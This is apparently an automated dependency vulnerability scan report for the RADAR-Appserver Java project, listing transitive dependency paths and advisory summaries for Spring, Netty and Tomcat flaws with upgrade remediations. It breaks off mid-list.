Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long SpEL expression.
Remediation
Upgrade org.springframework:spring-expression to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.
References
medium severity
new
- Vulnerable module: io.netty:netty-codec-http
- Introduced through: com.google.firebase:firebase-admin@9.8.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › com.google.firebase:firebase-admin@9.8.0 › io.netty:netty-codec-http@4.2.10.FinalRemediation: Upgrade to com.google.firebase:firebase-admin@9.9.0.
Overview
io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.
Affected versions of this package are vulnerable to HTTP Request Smuggling in the setUri function. An attacker can inject arbitrary CRLF sequences into the HTTP or RTSP request line by supplying crafted input to setUri, leading to the creation of additional requests or manipulation of request boundaries when the object is serialized by HttpRequestEncoder or RtspEncoder. This can result in request smuggling, desynchronization, or unauthorized access to internal APIs if attacker-controlled input is passed to setUri and subsequently encoded.
Note:
This is only exploitable if all of the following conditions are met:
The application uses
DefaultHttpRequestorDefaultFullHttpRequest;The request object is created first and later modified through
setUri();The value passed into
setUri()is attacker-controlled or attacker-influenced;The object is eventually serialized by
HttpRequestEncoderorRtspEncoder.
Remediation
Upgrade io.netty:netty-codec-http to version 4.1.133.Final, 4.2.13.Final or higher.
References
medium severity
- Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
- Introduced through: org.apache.tomcat.embed:tomcat-embed-core@10.1.52 and org.springframework.boot:spring-boot-starter-web@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.apache.tomcat.embed:tomcat-embed-core@10.1.52Remediation: Upgrade to org.apache.tomcat.embed:tomcat-embed-core@10.1.54.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
Overview
org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.
Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output in JsonAccessLogValve(), which relies on an unescaped append() in generating JSON logs. If non-default values are used for the Connector attributes relaxedPathChars or relaxedQueryChars, an attacker can inject malicious JSON into logs.
Remediation
Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.117, 10.1.54, 11.0.21 or higher.
References
medium severity
new
- Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
- Introduced through: org.apache.tomcat.embed:tomcat-embed-core@10.1.52 and org.springframework.boot:spring-boot-starter-web@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.apache.tomcat.embed:tomcat-embed-core@10.1.52Remediation: Upgrade to org.apache.tomcat.embed:tomcat-embed-core@10.1.55.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
Overview
org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.
Affected versions of this package are vulnerable to Timing Attack via AJP secret comparison. An attacker can perform a timing side-channel attack to determine whether a guessed secret is correct by sending many authentication attempts directly to the connector and measuring the time taken to compare secrets.
Remediation
Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.118, 10.1.55, 11.0.22 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Open Redirect when UriComponentsBuilder is used to parse an externally provided URL and perform validation checks on the host of the parsed URL.
Note: This is the same as CVE-2024-22259 and CVE-2024-22243, but with different input.
Remediation
Upgrade org.springframework:spring-web to version 5.3.34, 6.0.19, 6.1.6 or higher.
References
medium severity
new
- Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
- Introduced through: org.apache.tomcat.embed:tomcat-embed-core@10.1.52 and org.springframework.boot:spring-boot-starter-web@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.apache.tomcat.embed:tomcat-embed-core@10.1.52Remediation: Upgrade to org.apache.tomcat.embed:tomcat-embed-core@10.1.55.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
